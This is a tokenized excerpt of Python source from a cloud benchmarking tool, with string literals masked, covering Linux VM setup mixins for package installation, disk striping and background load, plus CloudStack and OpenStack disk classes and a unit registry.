RemoteHostCommand ( '<STR_LIT>' % <EOL> ( target . ssh_port , REMOTE_KEY_PATH , source_path , <EOL> remote_location ) ) <EOL> def AuthenticateVm ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_static and not self . has_private_key : <EOL> self . RemoteHostCopy ( vm_util . GetPrivateKeyPath ( ) , <EOL> REMOTE_KEY_PATH ) <EOL> with vm_util . NamedTemporaryFile ( ) as tf : <EOL> tf . write ( '<STR_LIT>' ) <EOL> tf . write ( '<STR_LIT>' ) <EOL> tf . close ( ) <EOL> self . PushFile ( tf . name , '<STR_LIT>' ) <EOL> self . has_private_key = True <EOL> def TestAuthentication ( self , peer ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . RemoteCommand ( '<STR_LIT>' % peer . internal_ip ) <EOL> except errors . VirtualMachine . RemoteCommandError : <EOL> raise errors . VirtualMachine . AuthError ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( self , peer ) ) <EOL> def CheckJavaVersion ( self ) : <EOL> """<STR_LIT>""" <EOL> version , _ = self . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return version [ : - <NUM_LIT:1> ] <EOL> def RemoveFile ( self , filename ) : <EOL> """<STR_LIT>""" <EOL> self . RemoteCommand ( '<STR_LIT>' % filename ) <EOL> def GetDeviceSizeFromPath ( self , path ) : <EOL> """<STR_LIT>""" <EOL> df_command = "<STR_LIT>" % path <EOL> stdout , _ = self . RemoteCommand ( df_command ) <EOL> return int ( stdout ) <EOL> def DropCaches ( self ) : <EOL> """<STR_LIT>""" <EOL> drop_caches_command = '<STR_LIT>' <EOL> self . RemoteCommand ( drop_caches_command ) <EOL> def _GetNumCpus ( self ) : <EOL> """<STR_LIT>""" <EOL> stdout , _ = self . RemoteCommand ( <EOL> '<STR_LIT>' ) <EOL> return int ( stdout ) <EOL> def _GetTotalMemoryKb ( self ) : <EOL> """<STR_LIT>""" <EOL> meminfo_command = '<STR_LIT>' <EOL> stdout , _ = self . RemoteCommand ( meminfo_command ) <EOL> return int ( stdout ) <EOL> def _TestReachable ( self , ip ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . 
RemoteCommand ( '<STR_LIT>' % ip ) <EOL> except errors . VirtualMachine . RemoteCommandError : <EOL> return False <EOL> return True <EOL> def SetupLocalDisks ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def _CreateScratchDiskFromDisks ( self , disk_spec , disks ) : <EOL> """<STR_LIT>""" <EOL> if len ( disks ) > <NUM_LIT:1> : <EOL> disk_spec . device_path = '<STR_LIT>' % len ( self . scratch_disks ) <EOL> data_disk = disk . StripedDisk ( disk_spec , disks ) <EOL> else : <EOL> data_disk = disks [ <NUM_LIT:0> ] <EOL> self . scratch_disks . append ( data_disk ) <EOL> if data_disk . disk_type != disk . LOCAL : <EOL> data_disk . Create ( ) <EOL> data_disk . Attach ( self ) <EOL> if data_disk . is_striped : <EOL> device_paths = [ d . GetDevicePath ( ) for d in data_disk . disks ] <EOL> self . StripeDisks ( device_paths , data_disk . GetDevicePath ( ) ) <EOL> if disk_spec . mount_point : <EOL> self . FormatDisk ( data_disk . GetDevicePath ( ) ) <EOL> self . MountDisk ( data_disk . GetDevicePath ( ) , disk_spec . mount_point ) <EOL> def StripeDisks ( self , devices , striped_device ) : <EOL> """<STR_LIT>""" <EOL> self . Install ( '<STR_LIT>' ) <EOL> stripe_cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( striped_device , len ( devices ) , '<STR_LIT:U+0020>' . join ( devices ) ) ) <EOL> self . RemoteHostCommand ( stripe_cmd ) <EOL> def BurnCpu ( self , burn_cpu_threads = None , burn_cpu_seconds = None ) : <EOL> """<STR_LIT>""" <EOL> burn_cpu_threads = burn_cpu_threads or FLAGS . burn_cpu_threads <EOL> burn_cpu_seconds = burn_cpu_seconds or FLAGS . burn_cpu_seconds <EOL> if burn_cpu_seconds : <EOL> self . Install ( '<STR_LIT>' ) <EOL> end_time = time . time ( ) + burn_cpu_seconds <EOL> self . RemoteCommand ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % burn_cpu_threads ) <EOL> if time . time ( ) < end_time : <EOL> time . sleep ( end_time - time . time ( ) ) <EOL> self . RemoteCommand ( '<STR_LIT>' ) <EOL> def PrepareBackgroundWorkload ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . 
background_cpu_threads : <EOL> self . Install ( '<STR_LIT>' ) <EOL> if self . background_network_mbits_per_sec : <EOL> self . Install ( '<STR_LIT>' ) <EOL> def StartBackgroundWorkload ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . background_cpu_threads : <EOL> self . RemoteCommand ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % self . background_cpu_threads ) <EOL> if self . background_network_mbits_per_sec : <EOL> self . AllowPort ( BACKGROUND_IPERF_PORT ) <EOL> self . RemoteCommand ( '<STR_LIT>' % <EOL> BACKGROUND_IPERF_PORT ) <EOL> stdout , _ = self . RemoteCommand ( '<STR_LIT>' ) <EOL> self . server_pid = stdout . strip ( ) <EOL> if self . background_network_ip_type == vm_util . IpAddressSubset . EXTERNAL : <EOL> ip_address = self . ip_address <EOL> else : <EOL> ip_address = self . internal_ip <EOL> iperf_cmd = ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( ip_address , BACKGROUND_IPERF_PORT , <EOL> BACKGROUND_IPERF_SECONDS , <EOL> self . background_network_mbits_per_sec ) ) <EOL> self . RemoteCommand ( iperf_cmd ) <EOL> stdout , _ = self . RemoteCommand ( '<STR_LIT>' ) <EOL> self . client_pid = stdout . strip ( ) <EOL> def StopBackgroundWorkload ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . background_cpu_threads : <EOL> self . RemoteCommand ( '<STR_LIT>' ) <EOL> if self . background_network_mbits_per_sec : <EOL> self . RemoteCommand ( '<STR_LIT>' + self . client_pid ) <EOL> self . RemoteCommand ( '<STR_LIT>' + self . server_pid ) <EOL> class RhelMixin ( BaseLinuxMixin ) : <EOL> """<STR_LIT>""" <EOL> OS_TYPE = os_types . RHEL <EOL> def OnStartup ( self ) : <EOL> """<STR_LIT>""" <EOL> self . RemoteHostCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' % self . user_name , <EOL> login_shell = True ) <EOL> def InstallEpelRepo ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . InstallPackages ( '<STR_LIT>' ) <EOL> except errors . VirtualMachine . RemoteCommandError as e : <EOL> stdout , _ = self . RemoteCommand ( '<STR_LIT>' ) <EOL> major_version = int ( re . 
search ( '<STR_LIT>' , stdout ) . group ( <NUM_LIT:1> ) ) <EOL> if major_version == <NUM_LIT:6> : <EOL> epel_rpm = EPEL6_RPM <EOL> elif major_version == <NUM_LIT:7> : <EOL> epel_rpm = EPEL7_RPM <EOL> else : <EOL> raise e <EOL> self . RemoteCommand ( '<STR_LIT>' % epel_rpm ) <EOL> def PackageCleanup ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( RhelMixin , self ) . PackageCleanup ( ) <EOL> self . RemoteCommand ( '<STR_LIT>' ) <EOL> def SnapshotPackages ( self ) : <EOL> """<STR_LIT>""" <EOL> self . RemoteCommand ( '<STR_LIT>' % vm_util . VM_TMP_DIR ) <EOL> def RestorePackages ( self ) : <EOL> """<STR_LIT>""" <EOL> self . RemoteCommand ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % <EOL> vm_util . VM_TMP_DIR , <EOL> ignore_failure = True ) <EOL> def InstallPackages ( self , packages ) : <EOL> """<STR_LIT>""" <EOL> self . RemoteCommand ( '<STR_LIT>' % packages ) <EOL> def InstallPackageGroup ( self , package_group ) : <EOL> """<STR_LIT>""" <EOL> self . RemoteCommand ( '<STR_LIT>' % package_group ) <EOL> def Install ( self , package_name ) : <EOL> """<STR_LIT>""" <EOL> if not self . install_packages : <EOL> return <EOL> if package_name not in self . _installed_packages : <EOL> package = linux_packages . PACKAGES [ package_name ] <EOL> package . YumInstall ( self ) <EOL> self . _installed_packages . add ( package_name ) <EOL> def Uninstall ( self , package_name ) : <EOL> """<STR_LIT>""" <EOL> package = linux_packages . PACKAGES [ package_name ] <EOL> if hasattr ( package , '<STR_LIT>' ) : <EOL> package . YumUninstall ( self ) <EOL> def GetPathToConfig ( self , package_name ) : <EOL> """<STR_LIT>""" <EOL> package = linux_packages . PACKAGES [ package_name ] <EOL> return package . YumGetPathToConfig ( self ) <EOL> def GetServiceName ( self , package_name ) : <EOL> """<STR_LIT>""" <EOL> package = linux_packages . PACKAGES [ package_name ] <EOL> return package . YumGetServiceName ( self ) <EOL> def SetupProxy ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( RhelMixin , self ) . 
SetupProxy ( ) <EOL> yum_proxy_file = "<STR_LIT>" <EOL> if FLAGS . http_proxy : <EOL> self . RemoteCommand ( "<STR_LIT>" % ( <EOL> FLAGS . http_proxy , yum_proxy_file ) ) <EOL> class DebianMixin ( BaseLinuxMixin ) : <EOL> """<STR_LIT>""" <EOL> OS_TYPE = os_types . DEBIAN <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( DebianMixin , self ) . __init__ ( * args , ** kwargs ) <EOL> self . _apt_updated = False <EOL> @ vm_util . Retry ( max_retries = UPDATE_RETRIES ) <EOL> def AptUpdate ( self ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . RemoteCommand ( '<STR_LIT>' , timeout = <NUM_LIT> ) <EOL> except errors . VirtualMachine . RemoteCommandError as e : <EOL> self . RemoteCommand ( '<STR_LIT>' ) <EOL> raise e <EOL> def SnapshotPackages ( self ) : <EOL> """<STR_LIT>""" <EOL> self . RemoteCommand ( <EOL> '<STR_LIT>' % vm_util . VM_TMP_DIR ) <EOL> def RestorePackages ( self ) : <EOL> """<STR_LIT>""" <EOL> self . RemoteCommand ( '<STR_LIT>' ) <EOL> self . RemoteCommand ( <EOL> '<STR_LIT>' % vm_util . VM_TMP_DIR ) <EOL> self . RemoteCommand ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> @ vm_util . Retry ( ) <EOL> def InstallPackages ( self , packages ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> install_command = ( '<STR_LIT>' <EOL> '<STR_LIT>' % ( packages ) ) <EOL> self . RemoteCommand ( install_command ) <EOL> except errors . VirtualMachine . RemoteCommandError as e : <EOL> self . RemoteCommand ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> logging . info ( '<STR_LIT>' <EOL> '<STR_LIT>' , packages , self ) <EOL> self . AptUpdate ( ) <EOL> raise e <EOL> def Install ( self , package_name ) : <EOL> """<STR_LIT>""" <EOL> if not self . install_packages : <EOL> return <EOL> if not self . _apt_updated : <EOL> self . AptUpdate ( ) <EOL> self . _apt_updated = True <EOL> if package_name not in self . _installed_packages : <EOL> package = linux_packages . PACKAGES [ package_name ] <EOL> package . AptInstall ( self ) <EOL> self . _installed_packages . 
add ( package_name ) <EOL> def Uninstall ( self , package_name ) : <EOL> """<STR_LIT>""" <EOL> package = linux_packages . PACKAGES [ package_name ] <EOL> if hasattr ( package , '<STR_LIT>' ) : <EOL> package . AptUninstall ( self ) <EOL> def GetPathToConfig ( self , package_name ) : <EOL> """<STR_LIT>""" <EOL> package = linux_packages . PACKAGES [ package_name ] <EOL> return package . AptGetPathToConfig ( self ) <EOL> def GetServiceName ( self , package_name ) : <EOL> """<STR_LIT>""" <EOL> package = linux_packages . PACKAGES [ package_name ] <EOL> return package . AptGetServiceName ( self ) <EOL> def SetupProxy ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( DebianMixin , self ) . SetupProxy ( ) <EOL> apt_proxy_file = "<STR_LIT>" <EOL> commands = [ ] <EOL> if FLAGS . http_proxy : <EOL> commands . append ( "<STR_LIT>" <EOL> '<STR_LIT>' % ( FLAGS . http_proxy , apt_proxy_file ) ) <EOL> if FLAGS . https_proxy : <EOL> commands . append ( "<STR_LIT>" <EOL> '<STR_LIT>' % ( FLAGS . https_proxy , apt_proxy_file ) ) <EOL> if commands : <EOL> self . RemoteCommand ( "<STR_LIT:;>" . join ( commands ) ) <EOL> class ContainerizedDebianMixin ( DebianMixin ) : <EOL> """<STR_LIT>""" <EOL> OS_TYPE = os_types . UBUNTU_CONTAINER <EOL> def _CheckDockerExists ( self ) : <EOL> """<STR_LIT>""" <EOL> resp , _ = self . RemoteHostCommand ( '<STR_LIT>' , ignore_failure = True , <EOL> suppress_warning = True ) <EOL> if resp . rstrip ( ) == "<STR_LIT>" : <EOL> return False <EOL> return True <EOL> def PrepareVMEnvironment ( self ) : <EOL> """<STR_LIT>""" <EOL> self . RemoteHostCommand ( '<STR_LIT>' % vm_util . VM_TMP_DIR ) <EOL> if not self . _CheckDockerExists ( ) : <EOL> self . Install ( '<STR_LIT>' ) <EOL> self . InitDocker ( ) <EOL> self . Install ( '<STR_LIT>' ) <EOL> super ( ContainerizedDebianMixin , self ) . PrepareVMEnvironment ( ) <EOL> def InitDocker ( self ) : <EOL> """<STR_LIT>""" <EOL> self . 
CONTAINER_IMAGE = '<STR_LIT>' <EOL> init_docker_cmd = [ '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % ( CONTAINER_WORK_DIR , <EOL> vm_util . VM_TMP_DIR , <EOL> CONTAINER_MOUNT_DIR ) ] <EOL> for sd in self . scratch_disks : <EOL> init_docker_cmd . append ( '<STR_LIT>' % ( sd . mount_point , sd . mount_point ) ) <EOL> init_docker_cmd . append ( '<STR_LIT>' % self . CONTAINER_IMAGE ) <EOL> init_docker_cmd = '<STR_LIT>' . join ( init_docker_cmd ) <EOL> resp , _ = self . RemoteHostCommand ( init_docker_cmd ) <EOL> self . docker_id = resp . rstrip ( ) <EOL> return self . docker_id <EOL> def RemoteCommand ( self , command , <EOL> should_log = False , retries = SSH_RETRIES , <EOL> ignore_failure = False , login_shell = False , <EOL> suppress_warning = False , timeout = None ) : <EOL> """<STR_LIT>""" <EOL> command = command . replace ( "<STR_LIT:'>" , r"<STR_LIT>" ) <EOL> logging . info ( '<STR_LIT>' % command ) <EOL> command = "<STR_LIT>" % ( self . docker_id , command ) <EOL> return self . RemoteHostCommand ( command , should_log , retries , <EOL> ignore_failure , login_shell , suppress_warning ) <EOL> def ContainerCopy ( self , file_name , container_path = '<STR_LIT>' , copy_to = True ) : <EOL> """<STR_LIT>""" <EOL> if copy_to : <EOL> if container_path == '<STR_LIT>' : <EOL> container_path = CONTAINER_WORK_DIR <EOL> source_path = posixpath . join ( CONTAINER_MOUNT_DIR , file_name ) <EOL> command = '<STR_LIT>' % ( source_path , container_path ) <EOL> self . RemoteCommand ( command ) <EOL> else : <EOL> if container_path == '<STR_LIT>' : <EOL> raise errors . VirtualMachine . RemoteExceptionError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> destination_path = posixpath . join ( CONTAINER_MOUNT_DIR , file_name ) <EOL> command = '<STR_LIT>' % ( container_path , destination_path ) <EOL> self . RemoteCommand ( command ) <EOL> @ vm_util . Retry ( <EOL> poll_interval = <NUM_LIT:1> , max_retries = <NUM_LIT:3> , <EOL> retryable_exceptions = ( errors . 
VirtualMachine . RemoteCommandError , ) ) <EOL> def RemoteCopy ( self , file_path , remote_path = '<STR_LIT>' , copy_to = True ) : <EOL> """<STR_LIT>""" <EOL> if copy_to : <EOL> file_name = os . path . basename ( file_path ) <EOL> tmp_path = posixpath . join ( vm_util . VM_TMP_DIR , file_name ) <EOL> self . RemoteHostCopy ( file_path , tmp_path , copy_to ) <EOL> self . ContainerCopy ( file_name , remote_path , copy_to ) <EOL> else : <EOL> file_name = posixpath . basename ( remote_path ) <EOL> tmp_path = posixpath . join ( vm_util . VM_TMP_DIR , file_name ) <EOL> self . ContainerCopy ( file_name , remote_path , copy_to ) <EOL> self . RemoteHostCopy ( file_path , tmp_path , copy_to ) <EOL> def MoveFile ( self , target , source_path , remote_path = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> file_name = posixpath . basename ( source_path ) <EOL> self . ContainerCopy ( file_name , source_path , copy_to = False ) <EOL> source_host_path = posixpath . join ( vm_util . VM_TMP_DIR , file_name ) <EOL> target_host_dir = vm_util . VM_TMP_DIR <EOL> self . MoveHostFile ( target , source_host_path , target_host_dir ) <EOL> target . ContainerCopy ( file_name , remote_path ) <EOL> class JujuMixin ( DebianMixin ) : <EOL> """<STR_LIT>""" <EOL> OS_TYPE = os_types . JUJU <EOL> is_controller = False <EOL> controller = None <EOL> vm_group = None <EOL> machines = { } <EOL> units = [ ] <EOL> installation_lock = threading . Lock ( ) <EOL> environments_yaml = """<STR_LIT>""" <EOL> def _Bootstrap ( self ) : <EOL> """<STR_LIT>""" <EOL> resp , _ = self . RemoteHostCommand ( '<STR_LIT>' ) <EOL> def JujuAddMachine ( self , unit ) : <EOL> """<STR_LIT>""" <EOL> resp , _ = self . RemoteHostCommand ( '<STR_LIT>' % <EOL> unit . internal_ip ) <EOL> machine_id = _ [ _ . rindex ( '<STR_LIT:U+0020>' ) : ] . strip ( ) <EOL> self . machines [ machine_id ] = unit <EOL> def JujuConfigureEnvironment ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . is_controller : <EOL> resp , _ = self . 
RemoteHostCommand ( '<STR_LIT>' ) <EOL> with vm_util . NamedTemporaryFile ( ) as tf : <EOL> tf . write ( self . environments_yaml . format ( self . internal_ip ) ) <EOL> tf . close ( ) <EOL> self . PushFile ( tf . name , '<STR_LIT>' ) <EOL> def JujuEnvironment ( self ) : <EOL> """<STR_LIT>""" <EOL> output , _ = self . RemoteHostCommand ( '<STR_LIT>' ) <EOL> return output . strip ( ) <EOL> def JujuRun ( self , cmd ) : <EOL> """<STR_LIT>""" <EOL> output , _ = self . RemoteHostCommand ( cmd ) <EOL> return output . strip ( ) <EOL> def JujuStatus ( self , pattern = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> output , _ = self . RemoteHostCommand ( '<STR_LIT>' % <EOL> pattern ) <EOL> return output . strip ( ) <EOL> def JujuVersion ( self ) : <EOL> """<STR_LIT>""" <EOL> output , _ = self . RemoteHostCommand ( '<STR_LIT>' ) <EOL> return output . strip ( ) <EOL> def JujuSet ( self , service , params = [ ] ) : <EOL> """<STR_LIT>""" <EOL> output , _ = self . RemoteHostCommand ( <EOL> '<STR_LIT>' % ( service , '<STR_LIT:U+0020>' . join ( params ) ) ) <EOL> return output . strip ( ) <EOL> @ vm_util . Retry ( poll_interval = <NUM_LIT:30> , timeout = <NUM_LIT> ) <EOL> def JujuWait ( self ) : <EOL> """<STR_LIT>""" <EOL> status = yaml . load ( self . JujuStatus ( ) ) <EOL> for service in status [ '<STR_LIT>' ] : <EOL> ss = status [ '<STR_LIT>' ] [ service ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> if ss not in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise errors . Juju . TimeoutException ( <EOL> '<STR_LIT>' % ( service , ss ) ) <EOL> if ss in [ '<STR_LIT:error>' ] : <EOL> debuglog = self . JujuRun ( '<STR_LIT>' ) <EOL> logging . warn ( debuglog ) <EOL> raise errors . Juju . UnitErrorException ( <EOL> '<STR_LIT>' % service ) <EOL> for unit in status [ '<STR_LIT>' ] [ service ] [ '<STR_LIT>' ] : <EOL> unit_data = status [ '<STR_LIT>' ] [ service ] [ '<STR_LIT>' ] [ unit ] <EOL> ag = unit_data [ '<STR_LIT>' ] <EOL> if ag != '<STR_LIT>' : <EOL> raise errors . Juju . 
TimeoutException ( <EOL> '<STR_LIT>' % ( service , ag ) ) <EOL> ws = unit_data [ '<STR_LIT>' ] [ '<STR_LIT>' ] <EOL> if ws not in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise errors . Juju . TimeoutException ( <EOL> '<STR_LIT>' % ( service , ws ) ) <EOL> def JujuDeploy ( self , charm , vm_group ) : <EOL> """<STR_LIT>""" <EOL> machines = [ ] <EOL> for machine_id , unit in self . machines . iteritems ( ) : <EOL> if unit . vm_group == vm_group : <EOL> machines . append ( machine_id ) <EOL> resp , _ = self . RemoteHostCommand ( <EOL> '<STR_LIT>' % ( charm , machines . pop ( ) ) ) <EOL> service = charm [ charm . rindex ( '<STR_LIT:/>' ) + <NUM_LIT:1> : ] <EOL> for machine in machines : <EOL> resp , _ = self . RemoteHostCommand ( <EOL> '<STR_LIT>' % ( service , machine ) ) <EOL> def JujuRelate ( self , service1 , service2 ) : <EOL> """<STR_LIT>""" <EOL> resp , _ = self . RemoteHostCommand ( <EOL> '<STR_LIT>' % ( service1 , service2 ) ) <EOL> def Install ( self , package_name ) : <EOL> """<STR_LIT>""" <EOL> package = linux_packages . PACKAGES [ package_name ] <EOL> try : <EOL> with self . controller . installation_lock : <EOL> if package_name not in self . controller . _installed_packages : <EOL> package . JujuInstall ( self . controller , self . vm_group ) <EOL> self . controller . _installed_packages . add ( package_name ) <EOL> except AttributeError as e : <EOL> logging . warn ( '<STR_LIT>' <EOL> % ( package_name , e ) ) <EOL> if package_name not in self . _installed_packages : <EOL> package . AptInstall ( self ) <EOL> self . _installed_packages . add ( package_name ) <EOL> def SetupPackageManager ( self ) : <EOL> if self . is_controller : <EOL> resp , _ = self . RemoteHostCommand ( <EOL> '<STR_LIT>' <EOL> ) <EOL> super ( JujuMixin , self ) . SetupPackageManager ( ) <EOL> def PrepareVMEnvironment ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( JujuMixin , self ) . PrepareVMEnvironment ( ) <EOL> if self . is_controller : <EOL> self . 
InstallPackages ( '<STR_LIT>' ) <EOL> self . JujuConfigureEnvironment ( ) <EOL> self . AuthenticateVm ( ) <EOL> self . _Bootstrap ( ) <EOL> for unit in self . units : <EOL> unit . controller = self <EOL> self . JujuAddMachine ( unit ) </s>
<s> """<STR_LIT>""" <EOL> import string <EOL> import logging <EOL> from perfkitbenchmarker import disk <EOL> from perfkitbenchmarker import vm_util <EOL> from perfkitbenchmarker import flags <EOL> from perfkitbenchmarker . providers . cloudstack import util <EOL> FLAGS = flags . FLAGS <EOL> class CloudStackDisk ( disk . BaseDisk ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , disk_spec , name , zone_id , project_id = None ) : <EOL> super ( CloudStackDisk , self ) . __init__ ( disk_spec ) <EOL> self . cs = util . CsClient ( <EOL> FLAGS . CS_API_URL , <EOL> FLAGS . CS_API_KEY , <EOL> FLAGS . CS_API_SECRET <EOL> ) <EOL> self . attached_vm_name = None <EOL> self . attached_vm_id = None <EOL> self . name = name <EOL> self . zone_id = zone_id <EOL> self . project_id = project_id <EOL> self . disk_offering_id = self . _GetBestOfferingId ( self . disk_size ) <EOL> assert self . disk_offering_id , "<STR_LIT>" <EOL> if disk_spec . disk_type : <EOL> logging . warn ( "<STR_LIT>" ) <EOL> @ vm_util . Retry ( max_retries = <NUM_LIT:3> ) <EOL> def _Create ( self ) : <EOL> """<STR_LIT>""" <EOL> volume = self . cs . create_volume ( self . name , <EOL> self . disk_offering_id , <EOL> self . zone_id , <EOL> self . project_id ) <EOL> assert volume , "<STR_LIT>" <EOL> self . volume_id = volume [ '<STR_LIT:id>' ] <EOL> self . disk_type = volume [ '<STR_LIT:type>' ] <EOL> self . actual_disk_size = int ( volume [ '<STR_LIT:size>' ] ) / ( <NUM_LIT:2> ** <NUM_LIT:30> ) <EOL> def _Delete ( self ) : <EOL> """<STR_LIT>""" <EOL> vol = self . cs . get_volume ( self . name , self . project_id ) <EOL> if vol : <EOL> self . cs . delete_volume ( self . volume_id ) <EOL> def _Exists ( self ) : <EOL> """<STR_LIT>""" <EOL> vol = self . cs . get_volume ( self . name , self . project_id ) <EOL> if vol : <EOL> return True <EOL> return False <EOL> @ vm_util . Retry ( max_retries = <NUM_LIT:3> ) <EOL> def Attach ( self , vm ) : <EOL> """<STR_LIT>""" <EOL> res = self . cs . attach_volume ( self . 
volume_id , vm . id ) <EOL> assert res , "<STR_LIT>" <EOL> self . device_id = res [ '<STR_LIT>' ] <EOL> self . device_path = "<STR_LIT>" + str ( string . ascii_lowercase [ self . device_id ] ) <EOL> def Detach ( self ) : <EOL> """<STR_LIT>""" <EOL> self . cs . detach_volume ( self . volume_id ) <EOL> def _GetBestOfferingId ( self , disk_size ) : <EOL> """<STR_LIT>""" <EOL> disk_offerings = self . cs . list_disk_offerings ( ) <EOL> sorted_do = sorted ( disk_offerings , key = lambda x : x [ '<STR_LIT>' ] ) <EOL> for do in sorted_do : <EOL> if int ( do [ '<STR_LIT>' ] ) >= disk_size : <EOL> return do [ '<STR_LIT:id>' ] <EOL> return None </s>
<s> import logging <EOL> import time <EOL> from perfkitbenchmarker import errors <EOL> from perfkitbenchmarker import flags <EOL> from perfkitbenchmarker import disk <EOL> from perfkitbenchmarker . providers . openstack import utils as os_utils <EOL> FLAGS = flags . FLAGS <EOL> class OpenStackDisk ( disk . BaseDisk ) : <EOL> def __init__ ( self , disk_spec , name , zone , image = None ) : <EOL> super ( OpenStackDisk , self ) . __init__ ( disk_spec ) <EOL> self . __nclient = os_utils . NovaClient ( ) <EOL> self . attached_vm_name = None <EOL> self . attached_vm_id = - <NUM_LIT:1> <EOL> self . image = image <EOL> self . name = name <EOL> self . zone = zone <EOL> self . device = None <EOL> self . _disk = None <EOL> def _Create ( self ) : <EOL> self . _disk = self . __nclient . volumes . create ( self . disk_size , <EOL> display_name = self . name , <EOL> availability_zone = self . zone , <EOL> imageRef = self . image , <EOL> ) <EOL> is_unavailable = True <EOL> while is_unavailable : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> volume = self . __nclient . volumes . get ( self . _disk . id ) <EOL> if volume : <EOL> is_unavailable = not ( volume . status == "<STR_LIT>" ) <EOL> self . _disk = volume <EOL> def _Delete ( self ) : <EOL> from novaclient . exceptions import NotFound <EOL> if self . _disk is None : <EOL> logging . info ( '<STR_LIT>' <EOL> % self . name ) <EOL> return <EOL> sleep = <NUM_LIT:1> <EOL> sleep_count = <NUM_LIT:0> <EOL> try : <EOL> self . __nclient . volumes . delete ( self . _disk ) <EOL> is_deleted = False <EOL> while not is_deleted : <EOL> volume = self . __nclient . volumes . get ( self . _disk . id ) <EOL> is_deleted = volume is None <EOL> time . sleep ( sleep ) <EOL> sleep_count += <NUM_LIT:1> <EOL> if sleep_count == <NUM_LIT:10> : <EOL> sleep = <NUM_LIT:5> <EOL> except NotFound : <EOL> logging . info ( '<STR_LIT>' <EOL> % self . _disk . id ) <EOL> def _Exists ( self ) : <EOL> from novaclient . 
exceptions import NotFound <EOL> try : <EOL> volume = self . __nclient . volumes . get ( self . _disk . id ) <EOL> return volume and volume . status in ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , ) <EOL> except NotFound : <EOL> return False <EOL> def Attach ( self , vm ) : <EOL> self . attached_vm_name = vm . name <EOL> self . attached_vm_id = vm . id <EOL> result = self . __nclient . volumes . create_server_volume ( vm . id , <EOL> self . _disk . id , <EOL> self . device ) <EOL> self . attach_id = result . id <EOL> volume = None <EOL> is_unattached = True <EOL> while is_unattached : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> volume = self . __nclient . volumes . get ( result . id ) <EOL> if volume : <EOL> is_unattached = not ( volume . status == "<STR_LIT>" <EOL> and volume . attachments ) <EOL> for attachment in volume . attachments : <EOL> if self . attach_id == attachment . get ( '<STR_LIT>' ) : <EOL> self . device = attachment . get ( '<STR_LIT>' ) <EOL> return <EOL> raise errors . Error ( "<STR_LIT>" % vm . name ) <EOL> def GetDevicePath ( self ) : <EOL> return self . device <EOL> def Detach ( self ) : <EOL> self . __nclient . volumes . delete_server_volume ( self . attached_vm_id , <EOL> self . attach_id ) </s>
<s> """<STR_LIT>""" <EOL> import copy <EOL> import copy_reg <EOL> import numbers <EOL> import pint <EOL> class _UnitRegistry ( pint . UnitRegistry ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> super ( _UnitRegistry , self ) . __init__ ( ) <EOL> self . define ( '<STR_LIT>' ) <EOL> self . define ( '<STR_LIT>' ) <EOL> def parse_expression ( self , input_string , * args , ** kwargs ) : <EOL> result = super ( _UnitRegistry , self ) . parse_expression ( input_string , * args , <EOL> ** kwargs ) <EOL> if ( isinstance ( result , numbers . Number ) and <EOL> input_string . strip ( ) . endswith ( '<STR_LIT:%>' ) ) : <EOL> return self . Quantity ( result , self . Unit ( '<STR_LIT>' ) ) <EOL> return result <EOL> _UNIT_REGISTRY = _UnitRegistry ( ) <EOL> def _PickleQuantity ( q ) : <EOL> return _UnPickleQuantity , ( q . to_tuple ( ) , ) <EOL> def _UnPickleQuantity ( inp ) : <EOL> return _UNIT_REGISTRY . Quantity . from_tuple ( inp ) <EOL> copy_reg . pickle ( _UNIT_REGISTRY . Quantity , _PickleQuantity ) <EOL> def _unit_deepcopy ( self , memo ) : <EOL> ret = self . __class__ ( copy . deepcopy ( self . _units ) ) <EOL> return ret <EOL> _UNIT_REGISTRY . Unit . __deepcopy__ = _unit_deepcopy <EOL> _UNIT_REGISTRY . Unit . __ne__ = lambda self , other : not self . __eq__ ( other ) <EOL> DimensionalityError = pint . DimensionalityError <EOL> ParseExpression = _UNIT_REGISTRY . parse_expression <EOL> Quantity = _UNIT_REGISTRY . Quantity <EOL> Unit = _UNIT_REGISTRY . Unit <EOL> byte = Unit ( '<STR_LIT>' ) <EOL> bit = Unit ( '<STR_LIT>' ) <EOL> second = Unit ( '<STR_LIT>' ) <EOL> percent = Unit ( '<STR_LIT>' ) </s>
